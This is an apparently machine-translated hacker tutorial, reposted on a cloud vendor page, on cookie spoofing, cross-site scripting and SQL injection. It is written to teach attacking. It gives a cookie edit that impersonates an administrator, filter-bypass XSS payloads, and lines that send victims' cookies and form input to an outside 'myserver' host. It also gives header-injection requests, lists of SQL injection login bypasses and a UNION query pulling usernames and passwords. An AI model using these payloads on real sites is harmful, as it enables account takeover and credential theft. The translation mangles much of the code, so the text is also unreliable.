Xss SQL Injection

Source: Internet
Author: User

Xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
X Web Security-XSS & more X
Xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Author: CyberPhreak
Translation: Ghost [S.S. T]

~ Introduction

In this article, I will explain all the knowledge about XSS and more. through this document, I hope you can understand what XSS is, Why XSS is used, and how to use XSS. once you learn, you will need to make full use of your creativity, because most people have fixed simple XSS vulnerabilities. but what they forget is to fix more vulnerabilities than a string of XSS, and the special security mechanisms in php are used to defend against XSS, replacing their own methods. at the same time, I will not only elaborate on XSS, but on all web security.

XXXXXXXXXXXXXXXXXXXXX
X Table OF Contents X
XXXXXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXXXXX
X Cookie Editing X
X XSS X
X SQL Injection X
XXXXXXXXXXXXXXXXXXXX

~ What is cookie?

Cookie is a piece of data. once you browse a site and register an account, a cookie is set to record your information. the cookie only saves your login information so that the site can check whether you have logged on before. If not, it will check whether your user name and password are correct and then log on. for example, if you buy a ticket in a nightclub, they will give you a card. therefore, you can enter and exit without buying tickets every time. cookies are much more complex than you can see. A nightclub can only remember you for one night, but cookies can remember you for a lifetime.

~ Warning & Spoofing

Now you know what cookies are... What do you think of them? In fact, cookie editing (modification) is one of the simplest methods. as long as you have a browser, you can view and edit cookies, and only need some basic javascript knowledge. open your browser and log on to a website... enter javascript: alert (document. cookie ). now you can see a user name and password. however, most websites use sessions instead of cookies. unfortunately, sessions cannot be modified (the server can). Unlike cookies, once you modify a cookie, you can cheat yourself. now let's start spoofing... suppose you see a warning box and see something like this:

Strusername = cnsst; strpassword = cnsst

Assume that you know that 'bitch' is an administrator, but you do not know the password. due to the fragile security mechanism, you do not need a password: javascript: void (document. cookie = "strusername = bitch ")
Now input: javascript: alert (document. cookie). That's almost very close to cookie modification...

~ What is XSS?

XSS or CSS, no matter what you prefer to call it, XSS (CSS) represents cross-site scripting. basically, you can inject scripts in any way to make them complete what you want. you can also intercept input information, such as the user name, password, and cookies through XSS. this will be discussed, so there will be a lot of examples. This article should help you develop your creativity on XSS.

~ Why XSS

Obviously, you can execute any types of scripts on the client and server through XSS. however, XSS is not limited to executing scripts, but also intercepting input. input: <input name = "name" type = "name">
You intercept input through XSS, and then send the intercepted information to your site through a secret file. this is not all the functions that XSS can achieve. XSS can also intercept cookies. cookies store valuable information, such as user names and passwords.

~ Let's get started...

I suppose you know html and javascript, and php knowledge is also helpful, but it is not necessary. Let's start with this php script.

XSS-Cross-Site Scripting
<Html>
<Body>
<Form action = "" method = "GET">
<! -- The GET method I used is easier to practice when we use it. -->
Script: <input name = "name" type = "name">
<Input type = "submit" value = "submit">
</Form>
</Body>
</Html>

<? Php
$ Name = $ _ GET ['name'];
Echo ("Hello $ name ");
?>

OK. We should all know what the above code is... this is a very strange script. No one will use it on their own site (at least I have never seen it), but it is really useful for beginners to understand the principles. let's take a look at the information I have entered:

Cnsst
"Hello cnsst! "

The information in the quotation marks is the output information:
<Script> alert (document. cookie) </script>

Then it will pop up document. cookie! So it is vulnerable to XSS attacks!

Now we have a little understanding of XSS, so let's understand it. first, the script is used to obtain your input and paste it. well... that is to say, we can input any data. so? Wait... any data... Okay. What languages do you want to ask the client and the server respectively? Let me tell you that basically the client language is built on your client browser: JavaScript, html, VBScript, and so on...

The server language is on the other side, not on your client, but on the server, php, asp, and so on...

There are some ways to inject php. I will explain it later. Now let's think about how this can help us? Inject javascript? Simple. for example, you are writing a website program. Because it is your site, you can use all the javascript (JS) You want to use ). so anyone else can, because XSS allows you to let the website run any script you want to run.

Let's take a look at a slightly complex example!

Assume that you have entered <script> alert (document. cookie) </script> and the ECHO is as follows:
Scriptalert (document. cookie)/script
Or it may be like this:
Scriptalertdocument. cookie/script

It can be seen that it is more difficult to use... however, there are many ways to use XSS, which is only one of them. it is also one of the worst methods. you can see that "<>" All are null characters "" are replaced.

Let's continue to use:
<Script> alert (document. cookie) </script>

Your output will pop up document. cookie.

Now let's take a look at it:
<Script> alert (document. cookie) </script>

They may replace all, or just "<>". So if one pair cannot be executed, the other can. Now, if you see:
Scriptalertdocument. cookie/script
Or <script> alert (document. cookie) </script>

They may replace two pairs to trick you, or replace some letters. Try to use them in your own way... you enter:
<Script> alert (document. cookie) </script>

The output is as follows: srplert (document. cookie) srp

After careful observation, you will find that there is nothing in document. cookie to be replaced. Why? Because they don't know what you want alert and what you want to do, they just guess that they only stop "<>" and the script part. How can they bypass it? Look at this:
<Sccriiptt> aalert (document. cookie) <// sccriiptt>

All redundant parts are replaced! Now, let's get a bit more advanced!

This time they used replacement, but checked the entire string! For example:
<Script> alert (document. cookie) </script>

The output will be:
Scriptalert (document. cookie) script

You are excited to say, "I know what to do! "OK, let's reconstruct it according to your method:
<Script> alert (document. cookie) </script>

Output: scriptalert (document. cookie) script. at this time, you may continue to add more <>. however, they replace any "<>", no matter how many... have you seen me say "anything? Use the following example:

<
Script
>
Alert
(
Document
.
Cookie
)
<
/
Script
>

Look at it, it does not replace "<>", it replaces the code keyword. so even if you write a code without "<>", it will still be replaced, which is why we write it like this. if the other party uses more stringent standards, it will replace any type of code, or even "alert "! How can we improve it? Look at this:
<

C
R
I

T
>
A
L
E
R
T
(
D
O
C
U
M
E

T
.
C
O
O
K
I
E
)
<
/

C
R
I

T
/
>

This should be fine, but if they still Replace "<", you can add 2 pairs "<>" (and you can replace document. cookie with any character)

There are more examples I can demonstrate, but what I teach you is to let you use your creativity.

Now let me talk about other XSS methods. We have discussed the client XSS before. Now let's take a look at the server side XSS.

First, let me explain the differences between them. the client is displayed in the interpreted language of your browser, such as JavaScript (JS) VBScript (VBS. the XSS on the server side uses the language from the server, such as php and asp. the client is viewed in the browser, and the server is viewed on the server.

We have learned how to construct the client XSS, and we must inject scripts to the server to construct the server. to complete this, we need to find a script like any XSS, but this script can save your XSS to the server. now, if you have published an article on a website, what you need to do now is replace the article with XSS. Why should we use JavaScript? Why not use php? But let me show you something first.
Document. forms (0). action = "http: // myserver/myscript. php
This can be performed both on the server side and on the client side. It does not matter. therefore, your script copies the information they entered to the form and saves it to *. txt file.

Assume that you have registered an account on the website and can customize the information...
Document. images (0). src = "http: // myserver/cookie. php" + document. cookie.
Or if you have space to store links to custom content, you can enter:
Javascript: location. href = "http: // myserver/cookie. php" + document. cookie
This will intercept the cookie of the user accessing our data. This can be used anywhere, not just on the data. It is just an example.

Sometimes a site will display your UserAgent and Referer... now let's try some XSS at the DOS prompt or in the command line window,
Telnet example.com
GET/page/toplacewhere_itechos_your_useragent.php HTTP/1.1
User-Agent: <script> alert (document. cookie) </script>
Referer: <script> alert (document. cookie) </script>

~ What is SQL injection?

SQL injection is one of the biggest security issues on the website. So what is SQL injection? In fact, it refers to SQL injection. Now let's explore different levels of SQL vulnerabilities. Suppose you have a login page like this:

<Html>
<Body>
<Form action = "" method = "POST">
Username: <input name = "name" type = "name">
Password: <input name = "password" type = "password">
<Input type = "submit" type = "submit" value = "Submit">
</Form>
</Body>
</Html>

There is an XSS vulnerability, but you don't have to worry about it. There is no way to guess or crack the password. So what should we do? SQL injection!

The simplest attack is to enter "'" in the user name and password "'". if there is no protection mechanism, you should get an error message. if you get it, It is very vulnerable to attacks. however, the error message is worthless unless you know how to use it. therefore, I will give you an injection list that you can use to use when you get an error message in single quotes.

'='
'OR 1 = 1 --
'OR a = --
'OR'

Since people have enhanced security, these injections are very difficult to use, but the following list is not noticed by many people in the security list:

'OR ''='
'OR "="
'OR' ="
'OR' ="
'OR "='
'OR ''='
'OR' =''
'OR "=''
'OR ''="

~
Now let me explain the union all select statement, which will SELECT a table in the database. The content displayed depends on the column you selected.
Union all select username, password FROM users

This query statement will be executed, .... What if it does not work?
Union all select username, password FROM users WHERE username = 'OR "='
AND password = 'OR "='

You may use other characters to replace 'OR "=' to inject existing injection points. But first, how do you know the table name? In fact, you discovered an SQL vulnerability, which gave you an error message containing the table name.

Once you find the vulnerability, you will inject it in a way similar to 'OR "=' as you used to get the table name. sometimes you want to query some useful data from a table, but you have to select all the tables, because you do not know which table the data to be queried is in. in the following example, there are 20 tables with different table names. You try to query an ip address list:
UNION ALL SELECT
Ip, ip FROM logs
WHERE ip = 'OR ''="

Do you see this now? (I'm sure you have seen it)
Http://example.com/index.php? Article = 34
Then we will browse the article with Id 34... Let's replace 34:
Http://example.com/index.php? Article ='

Now, remember what I said. Most people are not aware of the insecurity caused by '. You can always try different injection methods. Here are some examples:
Http://example.com/index.php? Article ='
Http://example.com/index.php? Article ='
Http://example.com/index.php? Article = 'OR 1 = 1 --
Http://example.com/index.php? Article = 'OR a = --
Http://example.com/index.php? Article = 'OR' ="
Http://example.com/index.php? Article = 'OR "='
Http://example.com/index.php? Article = 'OR ''='
Http://example.com/index.php? Article = 'OR' =''
Http://example.com/index.php? Article = 'OR ''='
Http://example.com/index.php? Article = 'OR "' ='
Http://example.com/index.php? Article = 'OR "'' ='

Make full use of your creativity!

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.